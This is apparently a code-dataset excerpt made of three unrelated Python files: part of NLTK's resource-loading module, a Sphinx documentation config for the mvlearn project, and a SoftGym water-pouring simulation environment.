elif format == 'fcfg':
resource_val = nltk.grammar.FeatureGrammar.fromstring(
string_data, logic_parser=logic_parser,
fstruct_reader=fstruct_reader, encoding=encoding)
elif format == 'fol':
resource_val = nltk.sem.read_logic(
string_data, logic_parser=nltk.sem.logic.LogicParser(),
encoding=encoding)
elif format == 'logic':
resource_val = nltk.sem.read_logic(
string_data, logic_parser=logic_parser, encoding=encoding)
elif format == 'val':
resource_val = nltk.sem.read_valuation(
string_data, encoding=encoding)
else:
raise AssertionError("Internal NLTK error: Format %s isn't "
"handled by nltk.data.load()" % (format,))
opened_resource.close()
# If requested, add it to the cache.
if cache:
try:
_resource_cache[(resource_url, format)] = resource_val
# TODO: add this line
# print('<<Caching a copy of %s>>' % (resource_url,))
except TypeError:
# We can't create weak references to some object types, like
# strings and tuples. For now, just don't cache them.
pass
return resource_val
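# Usage sketch (resource URLs are illustrative):
#
#   grammar = load('grammars/sample_grammars/toy.cfg')        # format inferred from .cfg
#   text = load('nltk:corpora/abc/rural.txt', format='text')  # decoded unicode contents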
def show_cfg(resource_url, escape='##'):
"""
Write out a grammar file, ignoring escaped and empty lines.
:type resource_url: str
:param resource_url: A URL specifying where the resource should be
loaded from. The default protocol is "nltk:", which searches
        for the file in the NLTK data package.
:type escape: str
:param escape: Prepended string that signals lines to be ignored
"""
resource_url = normalize_resource_url(resource_url)
resource_val = load(resource_url, format='text', cache=False)
lines = resource_val.splitlines()
    for line in lines:
        if line.startswith(escape): continue
        if re.match('^$', line): continue
        print(line)
def clear_cache():
"""
Remove all objects from the resource cache.
:see: load()
"""
_resource_cache.clear()
def _open(resource_url):
"""
Helper function that returns an open file object for a resource,
given its resource URL. If the given resource URL uses the "nltk:"
protocol, or uses no protocol, then use ``nltk.data.find`` to find
its path, and open it with the given mode; if the resource URL
uses the 'file' protocol, then open the file with the given mode;
    otherwise, delegate to ``urllib.request.urlopen``.
:type resource_url: str
:param resource_url: A URL specifying where the resource should be
loaded from. The default protocol is "nltk:", which searches
        for the file in the NLTK data package.
"""
resource_url = normalize_resource_url(resource_url)
protocol, path_ = split_resource_url(resource_url)
if protocol is None or protocol.lower() == 'nltk':
return find(path_, path + ['']).open()
elif protocol.lower() == 'file':
# urllib might not use mode='rb', so handle this one ourselves:
return find(path_, ['']).open()
else:
return urlopen(resource_url)
######################################################################
# Lazy Resource Loader
######################################################################
# We shouldn't apply @python_2_unicode_compatible
# decorator to LazyLoader, this is resource.__class__ responsibility.
class LazyLoader(object):
@py3_data
def __init__(self, _path):
self._path = _path
def __load(self):
resource = load(self._path)
# This is where the magic happens! Transform ourselves into
# the object by modifying our own __dict__ and __class__ to
# match that of `resource`.
self.__dict__ = resource.__dict__
self.__class__ = resource.__class__
def __getattr__(self, attr):
self.__load()
        # This looks circular, but it's not, since __load() changes our
# __class__ to something new:
return getattr(self, attr)
def __repr__(self):
self.__load()
        # This looks circular, but it's not, since __load() changes our
# __class__ to something new:
return repr(self)
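# Usage sketch (illustrative; the resource path is a placeholder). The proxy is
# cheap to create; the first attribute access triggers __load(), after which
# the object *is* the loaded resource:
#
#     >>> grammar = LazyLoader('grammars/sample_grammars/toy.cfg')  # no I/O yet
#     >>> grammar.productions()  # loads the resource and swaps __class__/__dict__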
######################################################################
# Open-On-Demand ZipFile
######################################################################
class OpenOnDemandZipFile(zipfile.ZipFile):
"""
A subclass of ``zipfile.ZipFile`` that closes its file pointer
whenever it is not using it; and re-opens it when it needs to read
data from the zipfile. This is useful for reducing the number of
open file handles when many zip files are being accessed at once.
``OpenOnDemandZipFile`` must be constructed from a filename, not a
file-like object (to allow re-opening). ``OpenOnDemandZipFile`` is
    read-only (i.e. ``write()`` and ``writestr()`` are disabled).
"""
@py3_data
def __init__(self, filename):
if not isinstance(filename, string_types):
            raise TypeError('OpenOnDemandZipFile filename must be a string')
zipfile.ZipFile.__init__(self, filename)
assert self.filename == filename
self.close()
def read(self, name):
assert self.fp is None
self.fp = open(self.filename, 'rb')
value = zipfile.ZipFile.read(self, name)
self.close()
return value
def write(self, *args, **kwargs):
""":raise NotImplementedError: OpenOnDemandZipfile is read-only"""
raise NotImplementedError('OpenOnDemandZipfile is read-only')
def writestr(self, *args, **kwargs):
""":raise NotImplementedError: OpenOnDemandZipfile is read-only"""
raise NotImplementedError('OpenOnDemandZipfile is read-only')
def __repr__(self):
return repr(str('OpenOnDemandZipFile(%r)') % self.filename)
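# Usage sketch (illustrative; the paths are placeholders). The underlying file
# handle is held open only for the duration of each read():
#
#     >>> z = OpenOnDemandZipFile('corpora/abc.zip')  # handle closed after construction
#     >>> data = z.read('abc/rural.txt')              # reopened, read, closed again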
######################################################################
#{ Seekable Unicode Stream Reader
######################################################################
class SeekableUnicodeStreamReader(object):
"""
A stream reader that automatically encodes the source byte stream
into unicode (like ``codecs.StreamReader``); but still supports the
``seek()`` and ``tell()`` operations correctly. This is in contrast
    to ``codecs.StreamReader``, which provides *broken* ``seek()`` and
``tell()`` methods.
This class was motivated by ``StreamBackedCorpusView``, which
makes extensive use of ``seek()`` and ``tell()``, and needs to be
able to handle unicode-encoded files.
Note: this class requires stateless decoders. To my knowledge,
this shouldn't cause a problem with any of python's builtin
unicode encodings.
"""
DEBUG = True #: If true, then perform extra sanity checks.
@py3_data
def __init__(self, stream, encoding, errors='strict'):
# Rewind the stream to its beginning.
stream.seek(0)
self.stream = stream
"""The underlying stream."""
self.encoding = encoding
"""The name of the encoding that should be used to encode the
underlying stream."""
self.errors = errors
"""The error mode that should be used when decoding data from
the underlying stream. Can be 'strict', 'ignore', or
'replace'."""
self.decode = codecs.getdecoder(encoding)
"""The function that is used to decode byte strings into
unicode strings."""
self.bytebuffer = b''
"""A buffer to use bytes that have been read but have not yet
been decoded. This is only used when the final bytes from
a read do not form a complete encoding for a character."""
self.linebuffer = None
"""A buffer used by ``readline()`` to hold characters that have
been read, but have not yet been returned by ``read()`` or
``readline()``. This buffer consists of a list of unicode
strings, where each string corresponds to a single line.
The final element of the list may or may not be a complete
line. Note that the existence of a linebuffer makes the
``tell()`` operation more complex, because it must backtrack
to the beginning of the buffer to determine the correct
file position in the underlying byte stream."""
self._rewind_checkpoint = 0
"""The file position at which the most recent read on the
underlying stream began. This is used, together with
``_rewind_numchars``, to backtrack to the beginning of
``linebuffer`` (which is required by ``tell()``)."""
self._rewind_numchars = None
"""The number of characters that have been returned since the
read that started at ``_rewind_checkpoint``. This is used,
together with ``_rewind_checkpoint``, to backtrack to the
beginning of ``linebuffer`` (which is required by ``tell()``)."""
self._bom = self._check_bom()
"""The length of the byte order marker at the beginning of
the stream (or None for no byte order marker)."""
#/////////////////////////////////////////////////////////////////
# Read methods
#/////////////////////////////////////////////////////////////////
def read(self, size=None):
"""
Read up to ``size`` bytes, decode them using this reader's
encoding, and return the resulting unicode string.
:param size: The maximum number of bytes to read. If not
specified, then read as many bytes as possible.
:type size: int
:rtype: unicode
"""
chars = self._read(size)
# If linebuffer is not empty, then include it in the result
if self.linebuffer:
chars = ''.join(self.linebuffer) + chars
self.linebuffer = None
self._rewind_numchars = None
return chars
def readline(self, size=None):
"""
Read a line of text, decode it using this reader's encoding,
and return the resulting unicode string.
:param size: The maximum number of bytes to read. If no
newline is encountered before ``size`` bytes have been read,
then the returned value may not be a complete line of text.
:type size: int
"""
# If we have a non-empty linebuffer, then return the first
# line from it. (Note that the last element of linebuffer may
# not be a complete line; so let _read() deal with it.)
if self.linebuffer and len(self.linebuffer) > 1:
line = self.linebuffer.pop(0)
self._rewind_numchars += len(line)
return line
readsize = size or 72
chars = ''
# If there's a remaining incomplete line in the buffer, add it.
if self.linebuffer:
chars += self.linebuffer.pop()
self.linebuffer = None
while True:
startpos = self.stream.tell() - len(self.bytebuffer)
new_chars = self._read(readsize)
# If we're at a '\r', then read one extra character, since
# it might be a '\n', to get the proper line ending.
if new_chars and new_chars.endswith('\r'):
new_chars += self._read(1)
chars += new_chars
lines = chars.splitlines(True)
if len(lines) > 1:
line = lines[0]
self.linebuffer = lines[1:]
self._rewind_numchars = len(new_chars)-(len(chars)-len(line))
self._rewind_checkpoint = startpos
break
elif len(lines) == 1:
line0withend = lines[0]
line0withoutend = lines[0].splitlines(False)[0]
if line0withend != line0withoutend: # complete line
line = line0withend
break
if not new_chars or size is not None:
line = chars
break
# Read successively larger blocks of text.
if readsize < 8000:
readsize *= 2
return line
def readlines(self, sizehint=None, keepends=True):
"""
Read this file's contents, decode them using this reader's
encoding, and return it as a list of unicode lines.
:rtype: list(unicode)
:param sizehint: Ignored.
:param keepends: If false, then strip newlines.
"""
return self.read().splitlines(keepends)
def next(self):
"""Return the next decoded line from the underlying stream."""
line = self.readline()
if line: return line
else: raise StopIteration
def __next__(self):
return self.next()
def __iter__(self):
"""Return self"""
return self
def xreadlines(self):
"""Return self"""
return self
#/////////////////////////////////////////////////////////////////
# Pass-through methods & properties
#/////////////////////////////////////////////////////////////////
@property
def closed(self):
"""True if the underlying stream is closed."""
return self.stream.closed
@property
def name(self):
"""The name of the underlying stream."""
return self.stream.name
@property
def mode(self):
"""The mode of the underlying stream."""
return self.stream.mode
def close(self):
"""
Close the underlying stream.
"""
self.stream.close()
#/////////////////////////////////////////////////////////////////
# Seek and tell
#/////////////////////////////////////////////////////////////////
def seek(self, offset, whence=0):
"""
Move the stream to a new file position. If the reader is
        maintaining any buffers, then they will be cleared.
:param offset: A byte count offset.
:param whence: If 0, then the offset is from the start of the file
(offset should be positive), if 1, then the offset is from the
current position (offset may be positive or negative); and if 2,
then the offset is from the end of the file (offset should
typically be negative).
"""
if whence == 1:
raise ValueError('Relative seek is not supported for '
'SeekableUnicodeStreamReader -- consider '
'using char_seek_forward() instead.')
self.stream.seek(offset, whence)
self.linebuffer = None
self.bytebuffer = b''
self._rewind_numchars = None
self._rewind_checkpoint = self.stream.tell()
def char_seek_forward(self, offset):
"""
Move the read pointer forward by ``offset`` characters.
"""
if offset < 0:
raise ValueError('Negative offsets are not supported')
# Clear all buffers.
self.seek(self.tell())
# Perform the seek operation.
self._char_seek_forward(offset)
def _char_seek_forward(self, offset, est_bytes=None):
"""
Move the file position forward by ``offset`` characters,
ignoring all buffers.
:param est_bytes: A hint, giving an estimate of the number of
            bytes that will be needed to move forward by ``offset`` chars.
Defaults to ``offset``.
"""
if est_bytes is None: est_bytes = offset
bytes = b''
while True:
# Read in a block of bytes.
newbytes = self.stream.read(est_bytes-len(bytes))
bytes += newbytes
# Decode the bytes to characters.
chars, bytes_decoded = self._incr_decode(bytes)
# If we got the right number of characters, then seek
# backwards over any truncated characters, and return.
if len(chars) == offset:
self.stream.seek(-len(bytes)+bytes_decoded, 1)
return
# If we went too far, then we can back-up until we get it
# right, using the bytes we've already read.
if len(chars) > offset:
while len(chars) > offset:
# Assume at least one byte/char.
est_bytes += offset-len(chars)
chars, bytes_decoded = self._incr_decode(bytes[:est_bytes])
self.stream.seek(-len(bytes)+bytes_decoded, 1)
return
# Otherwise, we haven't read enough bytes yet; loop again.
est_bytes += offset - len(chars)
def tell(self):
"""
Return the current file position on the underlying byte
stream. If this reader is maintaining any buffers, then the
returned file position will be the position of the beginning
of those buffers.
"""
# If nothing's buffered, then just return our current filepos:
if self.linebuffer is None:
return self.stream.tell() - len(self.bytebuffer)
# Otherwise, we'll need to backtrack the filepos until we
# reach the beginning of the buffer.
# Store our original file position, so we can return here.
orig_filepos = self.stream.tell()
# Calculate an estimate of where we think the newline is.
bytes_read = ( (orig_filepos-len(self.bytebuffer)) -
self._rewind_checkpoint )
buf_size = sum(len(line) for line in self.linebuffer)
est_bytes = int((bytes_read * self._rewind_numchars /
(self._rewind_numchars + buf_size)))
self.stream.seek(self._rewind_checkpoint)
self._char_seek_forward(self._rewind_numchars, est_bytes)
filepos = self.stream.tell()
# Sanity check
if self.DEBUG:
self.stream.seek(filepos)
check1 = self._incr_decode(self.stream.read(50))[0]
check2 = ''.join(self.linebuffer)
assert check1.startswith(check2) or check2.startswith(check1)
# Return to our original filepos (so we don't have to throw
# out our buffer.)
self.stream.seek(orig_filepos)
# Return the calculated filepos
return filepos
#/////////////////////////////////////////////////////////////////
# Helper methods
#/////////////////////////////////////////////////////////////////
def _read(self, size=None):
"""
Read up to ``size`` bytes from the underlying stream, decode
them using this reader's encoding, and return the resulting
unicode string. ``linebuffer`` is not included in the result.
"""
if size == 0: return ''
# Skip past the byte order marker, if present.
if self._bom and self.stream.tell() == 0:
self.stream.read(self._bom)
# Read the requested number of bytes.
if size is None:
new_bytes = self.stream.read()
else:
new_bytes = self.stream.read(size)
bytes = self.bytebuffer + new_bytes
# Decode the bytes into unicode characters
chars, bytes_decoded = self._incr_decode(bytes)
# If we got bytes but couldn't decode any, then read further.
if (size is not None) and (not chars) and (len(new_bytes) > 0):
while not chars:
new_bytes = self.stream.read(1)
if not new_bytes: break # end of file.
bytes += new_bytes
chars, bytes_decoded = self._incr_decode(bytes)
# Record any bytes we didn't consume.
self.bytebuffer = bytes[bytes_decoded:]
# Return the result
return chars
def _incr_decode(self, bytes):
"""
Decode the given byte string into a unicode string, using this
reader's encoding. If an exception is encountered that
appears to be caused by a truncation error, then just decode
        the byte string without the bytes that cause the truncation
error.
Return a tuple ``(chars, num_consumed)``, where ``chars`` is
the decoded unicode string, and ``num_consumed`` is the
number of bytes that were consumed.
"""
while True:
try:
return self.decode(bytes, 'strict')
except UnicodeDecodeError as exc:
# If the exception occurs at the end of the string,
# then assume that it's a truncation error.
if exc.end == len(bytes):
return self.decode(bytes[:exc.start], self.errors)
# Otherwise, if we're being strict, then raise it.
elif self.errors == 'strict':
raise
# If we're not strict, then re-process it with our
# errors setting. This *may* raise an exception.
else:
return self.decode(bytes, self.errors)
_BOM_TABLE = {
'utf8': [(codecs.BOM_UTF8, None)],
'utf16': [(codecs.BOM_UTF16_LE, 'utf16-le'),
(codecs.BOM_UTF16_BE, 'utf16-be')],
'utf16le': [(codecs.BOM_UTF16_LE, None)],
'utf16be': [(codecs.BOM_UTF16_BE, None)],
'utf32': [(codecs.BOM_UTF32_LE, 'utf32-le'),
(codecs.BOM_UTF32_BE, 'utf32-be')],
'utf32le': [(codecs.BOM_UTF32_LE, None)],
'utf32be': [(codecs.BOM_UTF32_BE, None)],
}
def _check_bom(self):
# Normalize our encoding name
enc = re.sub('[ -]', '', self.encoding.lower())
# Look up our encoding in the BOM table.
bom_info = self._BOM_TABLE.get(enc)
if bom_info:
# Read a prefix, to check against the BOM(s)
bytes = self.stream.read(16)
self.stream.seek(0)
# Check for each possible BOM.
for (bom, new_encoding) in bom_info:
if bytes.startswith(bom):
if new_encoding: self.encoding = new_encoding
return len(bom)
return None
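# A small self-contained sketch of the seek()/tell() round-trip this class
# supports (expected results shown as trailing comments):
#
#     >>> import io
#     >>> raw = u'caf\xe9\nbar\n'.encode('utf-8')
#     >>> reader = SeekableUnicodeStreamReader(io.BytesIO(raw), 'utf-8')
#     >>> first = reader.readline()   # u'caf\xe9\n'
#     >>> pos = reader.tell()         # byte offset just after the first line
#     >>> reader.readline()           # u'bar\n'
#     >>> reader.seek(pos)
#     >>> reader.readline()           # u'bar\n' again, as expected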
__all__ = ['path', 'PathPointer', 'FileSystemPathPointer', 'BufferedGzipFile',
           'GzipFileSystemPathPointer',
           'find', 'retrieve', 'FORMATS', 'AUTO_FORMATS', 'load',
           'show_cfg', 'clear_cache', 'LazyLoader', 'OpenOnDemandZipFile',
           'SeekableUnicodeStreamReader']
|
the-stack_0_19852 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
from distutils.version import LooseVersion
import matplotlib
# Use RTD Theme
import sphinx_rtd_theme
import sphinx_gallery
sys.path.insert(0, os.path.abspath(".."))
# -- Project information -----------------------------------------------------
project = "mvlearn"
copyright = "2019-2020"
authors = u"Richard Guo, Ronan Perry, Gavin Mischler, Theo Lee, " \
"Alexander Chang, Arman Koul, Cameron Franz"
# The short X.Y version
# Find mvlearn version.
PROJECT_PATH = os.path.dirname(os.path.abspath(__file__))
for line in open(os.path.join(PROJECT_PATH, "..", "mvlearn", "__init__.py")):
if line.startswith("__version__ = "):
version = line.strip().split()[2][1:-1]
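# For example, a line in mvlearn/__init__.py of the form
#     __version__ = "0.4.1"
# splits into ['__version__', '=', '"0.4.1"'], so [2][1:-1] strips the quotes
# and yields '0.4.1' (the version string here is only illustrative).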
# The full version, including alpha/beta/rc tags
release = "alpha"
# -- Extension configuration -------------------------------------------------
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"sphinx.ext.mathjax",
"sphinx.ext.napoleon",
"sphinx.ext.ifconfig",
"sphinx.ext.githubpages",
"sphinx.ext.intersphinx",
'sphinx_gallery.gen_gallery',
]
if LooseVersion(sphinx_gallery.__version__) < LooseVersion('0.2'):
raise ImportError('Must have at least version 0.2 of sphinx-gallery, got '
'%s' % (sphinx_gallery.__version__,))
matplotlib.use('agg')
# -- sphinxcontrib.rawfiles
#rawfiles = ["CNAME"]
# -- numpydoc
# Below is needed to prevent errors
numpydoc_show_class_members = False
# -- sphinx.ext.autosummary
autosummary_generate = True
# -- sphinx.ext.autodoc
autoclass_content = "both"
autodoc_default_flags = ["members", "inherited-members"]
autodoc_member_order = "bysource" # default is alphabetical
# -- sphinx.ext.intersphinx
intersphinx_mapping = {
"numpy": ("https://docs.scipy.org/doc/numpy", None),
"python": ("https://docs.python.org/3", None),
"scipy": ("https://docs.scipy.org/doc/scipy/reference", None),
"sklearn": ("http://scikit-learn.org/dev", None),
}
# -- sphinx options ----------------------------------------------------------
source_suffix = ".rst"
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store", "**.ipynb_checkpoints"]
master_doc = "index"
source_encoding = "utf-8"
# -- Options for HTML output -------------------------------------------------
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
html_static_path = ["_static"]
modindex_common_prefix = ["mvlearn."]
pygments_style = "sphinx"
smartquotes = False
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_theme_options = {
# 'includehidden': False,
"collapse_navigation": False,
"navigation_depth": 3,
"logo_only": True,
}
html_logo = "./figures/mvlearn-logo-transparent-white.png"
html_context = {
# Enable the "Edit in GitHub link within the header of each page.
"display_github": True,
# Set the following variables to generate the resulting github URL for each page.
# Format Template: https://{{ github_host|default("github.com") }}/{{ github_user }}/{{ github_repo }}/blob/{{ github_version }}{{ conf_py_path }}{{ pagename }}{{ suffix }}
"github_user": "mvlearn",
"github_repo": "mvlearn",
"github_version": "master/docs/",
}
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "mvlearndoc"
# -- Options for LaTeX output ------------------------------------------------
def setup(app):
    # to hide/show the prompt in code examples
    # (add_js_file is the Sphinx >= 1.8 replacement for the removed add_javascript):
    app.add_js_file("js/copybutton.js")
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, "mvlearn.tex", "mvlearn Documentation", authors, "manual")
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "mvlearn", "mvlearn Documentation", [authors], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"mvlearn",
"mvlearn Documentation",
authors,
"mvlearn",
"One line description of project.",
"Miscellaneous",
)
]
# intersphinx configuration (note: this overrides the intersphinx_mapping defined above)
intersphinx_mapping = {
'python': ('https://docs.python.org/{.major}'.format(
sys.version_info), None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('https://matplotlib.org/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'joblib': ('https://joblib.readthedocs.io/en/latest/', None),
'seaborn': ('https://seaborn.pydata.org/', None),
}
sphinx_gallery_conf = {
'doc_module': ('mvlearn',),
'examples_dirs': '../examples',
'gallery_dirs': 'auto_examples',
'reference_url': {
'mvlearn': None,
}
}
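# Note: sphinx-gallery resolves 'examples_dirs' relative to this conf.py, so
# the example scripts are expected in <repo>/examples, and the generated
# gallery pages are written under docs/auto_examples.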
|
the-stack_0_19854 | import numpy as np
from gym.spaces import Box
import pyflex
from softgym.envs.fluid_env import FluidEnv
import copy
from softgym.utils.misc import rotate_rigid_object, quatFromAxisAngle
from shapely.geometry import Polygon
import random, math
class PourWaterPosControlEnv(FluidEnv):
def __init__(self, observation_mode, action_mode,
config=None, cached_states_path='pour_water_init_states.pkl', **kwargs):
'''
This class implements a pouring water task.
observation_mode: "cam_rgb" or "point_cloud" or "key_point"
action_mode: "rotation_bottom, rotation_top"
'''
assert observation_mode in ['cam_rgb', 'point_cloud', 'key_point']
assert action_mode in ['rotation_bottom', 'rotation_top']
if action_mode == 'rotation_top':
cached_states_path = 'pour_water_init_states_top.pkl'
self.observation_mode = observation_mode
self.action_mode = action_mode
self.wall_num = 5 # number of glass walls. floor/left/right/front/back
super().__init__(**kwargs)
self.get_cached_configs_and_states(cached_states_path, self.num_variations)
if observation_mode in ['point_cloud', 'key_point']:
if observation_mode == 'key_point':
obs_dim = 0
                obs_dim += 13  # cup poses/sizes (10), water height (1), and water fraction in each cup (2)
else:
max_particle_num = 13 * 13 * 13 * 4
obs_dim = max_particle_num * 3
self.particle_obs_dim = obs_dim
# z and theta of the second cup (poured_glass) does not change and thus are omitted.
# add: frac of water in control cup, frac of water in target cup
self.observation_space = Box(low=np.array([-np.inf] * obs_dim), high=np.array([np.inf] * obs_dim), dtype=np.float32)
elif observation_mode == 'cam_rgb':
self.observation_space = Box(low=-np.inf, high=np.inf, shape=(self.camera_height, self.camera_width, 3),
dtype=np.float32)
default_config = self.get_default_config()
border = default_config['glass']['border']
if action_mode in ["rotation_bottom", "rotation_top"]:
self.action_direct_dim = 3
# control the (x, y) corrdinate of the floor center, and theta its rotation angle.
action_low = np.array([-0.01, -0.01, -0.015])
action_high = np.array([0.01, 0.01, 0.015])
self.action_space = Box(action_low, action_high, dtype=np.float32)
else:
raise NotImplementedError
self.prev_reward = 0
self.reward_min = 0
self.reward_max = 1
self.reward_range = self.reward_max - self.reward_min
def get_default_config(self):
config = {
'fluid': {
'radius': 0.033,
'rest_dis_coef': 0.55,
'cohesion': 0.1, # not actually used, instead, is computed as viscosity * 0.01
'viscosity': 2,
'surfaceTension': 0,
'adhesion': 0.0, # not actually used, instead, is computed as viscosity * 0.001
'vorticityConfinement': 40,
'solidpressure': 0.,
'dim_x': 8,
'dim_y': 18,
'dim_z': 8,
},
'glass': {
'border': 0.045,
'height': 0.6,
'glass_distance': 1.0,
'poured_border': 0.04,
'poured_height': 0.6,
},
'camera_name': 'default_camera',
}
return config
def generate_env_variation(self, num_variations=5, config=None, **kwargs):
dim_xs = [4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
dim_zs = [4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
self.cached_configs = []
self.cached_init_states = []
if config is None:
config = self.get_default_config()
config_variations = [copy.deepcopy(config) for _ in range(num_variations)]
for idx in range(num_variations):
print("pour water generate env variations {}".format(idx))
dim_x = random.choice(dim_xs)
dim_z = random.choice(dim_zs)
m = min(dim_x, dim_z)
p = np.random.rand()
water_radius = config['fluid']['radius'] * config['fluid']['rest_dis_coef']
            if p < 0.5:  # medium water volume
print("generate env variation: medium volume water")
dim_y = int(3.5 * m)
v = dim_x * dim_y * dim_z
h = v / ((dim_x + 1) * (dim_z + 1)) * water_radius / 2
glass_height = h + (np.random.rand() - 0.5) * 0.001 + config['glass']['border']
else:
print("generate env variation: large volume water")
dim_y = 4 * m
v = dim_x * dim_y * dim_z
h = v / ((dim_x + 1) * (dim_z + 1)) * water_radius / 3
glass_height = h + (m + np.random.rand()) * 0.001 + config['glass']['border']
config_variations[idx]['fluid']['dim_x'] = dim_x
config_variations[idx]['fluid']['dim_y'] = dim_y
config_variations[idx]['fluid']['dim_z'] = dim_z
# if you want to change viscosity also, uncomment this
# config_variations[idx]['fluid']['viscosity'] = self.rand_float(2.0, 10.0)
config_variations[idx]['glass']['height'] = glass_height
config_variations[idx]['glass']['poured_height'] = glass_height + np.random.rand() * 0.1
config_variations[idx]['glass']['glass_distance'] = self.rand_float(0.05 * m, 0.09 * m) + (dim_x + 4) * water_radius / 2.
config_variations[idx]['glass']['poured_border'] = 0.03
self.set_scene(config_variations[idx])
init_state = copy.deepcopy(self.get_state())
self.cached_configs.append(config_variations[idx])
self.cached_init_states.append(init_state)
        return self.cached_configs, self.cached_init_states
def get_config(self):
if self.deterministic:
config_idx = 0
else:
config_idx = np.random.randint(len(self.config_variations))
self.config = self.config_variations[config_idx]
return self.config
def _reset(self):
'''
reset to environment to the initial state.
return the initial observation.
'''
self.inner_step = 0
self.performance_init = None
info = self._get_info()
self.performance_init = info['performance']
pyflex.step(render=True)
return self._get_obs()
def get_state(self):
'''
get the postion, velocity of flex particles, and postions of flex shapes.
'''
particle_pos = pyflex.get_positions()
particle_vel = pyflex.get_velocities()
shape_position = pyflex.get_shape_states()
return {'particle_pos': particle_pos, 'particle_vel': particle_vel, 'shape_pos': shape_position,
'glass_x': self.glass_x, 'glass_y': self.glass_y, 'glass_rotation': self.glass_rotation,
'glass_states': self.glass_states, 'poured_glass_states': self.poured_glass_states,
'glass_params': self.glass_params, 'config_id': self.current_config_id}
def set_state(self, state_dic):
'''
set the postion, velocity of flex particles, and postions of flex shapes.
'''
pyflex.set_positions(state_dic["particle_pos"])
pyflex.set_velocities(state_dic["particle_vel"])
pyflex.set_shape_states(state_dic["shape_pos"])
self.glass_x = state_dic['glass_x']
self.glass_y = state_dic['glass_y']
self.glass_rotation = state_dic['glass_rotation']
self.glass_states = state_dic['glass_states']
self.poured_glass_states = state_dic['poured_glass_states']
for _ in range(5):
pyflex.step()
def initialize_camera(self):
self.camera_params = {
'default_camera': {'pos': np.array([1.4, 1.5, 0.1]),
'angle': np.array([0.45 * np.pi, -60 / 180. * np.pi, 0]),
'width': self.camera_width,
'height': self.camera_height},
'cam_2d': {'pos': np.array([0.5, .7, 4.]),
'angle': np.array([0, 0, 0.]),
'width': self.camera_width,
'height': self.camera_height}
}
def set_poured_glass_params(self, config):
params = config
self.glass_distance = params['glass_distance']
self.poured_border = params['poured_border']
self.poured_height = params['poured_height']
        fluid_radius = self.fluid_params['radius'] * self.fluid_params['rest_dis_coef']
        self.poured_glass_dis_x = self.fluid_params['dim_x'] * fluid_radius + 0.07  # glass floor length
        self.poured_glass_dis_z = self.fluid_params['dim_z'] * fluid_radius + 0.07  # glass width
params['poured_glass_dis_x'] = self.poured_glass_dis_x
params['poured_glass_dis_z'] = self.poured_glass_dis_z
params['poured_glass_x_center'] = self.x_center + params['glass_distance']
self.glass_params.update(params)
def set_pouring_glass_params(self, config):
params = config
self.border = params['border']
self.height = params['height']
        fluid_radius = self.fluid_params['radius'] * self.fluid_params['rest_dis_coef']
        self.glass_dis_x = self.fluid_params['dim_x'] * fluid_radius + 0.1  # glass floor length
        self.glass_dis_z = self.fluid_params['dim_z'] * fluid_radius + 0.1  # glass width
params['glass_dis_x'] = self.glass_dis_x
params['glass_dis_z'] = self.glass_dis_z
params['glass_x_center'] = self.x_center
self.glass_params = params
def set_scene(self, config, states=None, create_only=False):
'''
Construct the pouring water scence.
'''
# create fluid
super().set_scene(config) # do not sample fluid parameters, as it's very likely to generate very strange fluid
# compute glass params
if states is None:
self.set_pouring_glass_params(config["glass"])
self.set_poured_glass_params(config["glass"])
else:
glass_params = states['glass_params']
self.border = glass_params['border']
self.height = glass_params['height']
self.glass_dis_x = glass_params['glass_dis_x']
self.glass_dis_z = glass_params['glass_dis_z']
self.glass_distance = glass_params['glass_distance']
self.poured_border = glass_params['poured_border']
self.poured_height = glass_params['poured_height']
self.poured_glass_dis_x = glass_params['poured_glass_dis_x']
self.poured_glass_dis_z = glass_params['poured_glass_dis_z']
self.glass_params = glass_params
# create pouring glass & poured glass
self.create_glass(self.glass_dis_x, self.glass_dis_z, self.height, self.border)
self.create_glass(self.poured_glass_dis_x, self.poured_glass_dis_z, self.poured_height, self.poured_border)
# move pouring glass to be at ground
self.glass_states = self.init_glass_state(self.x_center, 0, self.glass_dis_x, self.glass_dis_z, self.height, self.border)
# move poured glass to be at ground
self.poured_glass_states = self.init_glass_state(self.x_center + self.glass_distance, 0,
self.poured_glass_dis_x, self.poured_glass_dis_z, self.poured_height, self.poured_border)
self.set_shape_states(self.glass_states, self.poured_glass_states)
# record glass floor center x, y, and rotation
self.glass_x = self.x_center
if self.action_mode == 'rotation_bottom':
self.glass_y = 0
elif self.action_mode == 'rotation_top':
self.glass_y = 0.5 * self.border + self.height
self.glass_rotation = 0
